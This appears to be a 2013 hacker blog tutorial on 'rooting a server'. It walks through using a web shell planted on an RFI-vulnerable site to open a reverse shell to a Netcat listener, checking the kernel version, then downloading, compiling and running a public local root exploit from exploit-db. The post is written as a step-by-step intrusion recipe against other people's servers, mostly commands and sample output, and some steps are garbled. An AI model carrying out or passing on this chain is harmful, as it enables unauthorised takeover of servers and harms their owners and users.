Email To :-
Djalone.Hacker@Gmail.com

Saturday, January 12, 2013

Rooting a Server...



Hi Guys... This Is DJ Alone... Lets ROOT a Server As Per I Promised...It Looks Hard... But No It Doesn't...

Things Required :-

 1. Netcat (Download Here For Windows Linux)
2. Shlled Site (use I-47 or Mulci Shell)
3. RFI Vulnerable Site
4. Good Understanding Brain...
Open Your Shell & Go To 'Backdoor Host' Tab... And Forward a Port.
Now Go to The 'Back Connect' tab & Enter The Following Details There...

1. Your I.P. address
2. The port you forwarded
Now go to CMD and type 
in:cd 'Path to your Netcat.exe' 

 After opening netcat you need to make it listen on the port you forwarded earlier.

 For doing this type the command given below in netcat -
nc -l -n -v -p port

 It must be looking like this - 
Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp.
C:\FeAR>cd C:\
C:\>cd WINDOWS
C:\WINDOWS>nc -l -n -v -p 4444 listening on [any] 4444 ...

 Now when you have Netcat listening to the port forwarded by you, click on 'Connect'.

 I hope you must be connected by now......
Type 'whoami'...

 Now its time for the hardest part of the tutorial....

 Time to find an exploit to the root box, for this you have to know about its kernel version...Use the below code to find that - 
'uname -a'

 It must be looking like this -
 Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686
Now go on http://exploit-db.com/ and search for '2.6.17'.
You will get this - 
http://www.exploit-db.com/exploits/5092/ 
Now in your netcat window type this - 
'wget http://www.exploit-db.com/exploits/5092/ on the netcat window.
Code:
wget http://xpl_url.com
For the exploits to work, you have to compile it in server(gcc) and execute it via exploit(-o)
For doing this you have to type - 
'gcc 5092 -o exploit' 
Add 5092 after the url path
http://site.com/5092

  Now you can execute your exploit by typing './exploit' 

 Wait for the exploit to finish and type root again.
You should witness something like this - 
uid=0(root) gid=0(root) groups=500(apache)
 This shows that you have successfully rooted the server.
There are many more ways to do this...But This one is Best & efficient...

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

 

About Author

DJ Alone is a Blogger , Penetration Tester, Ethical Hacker.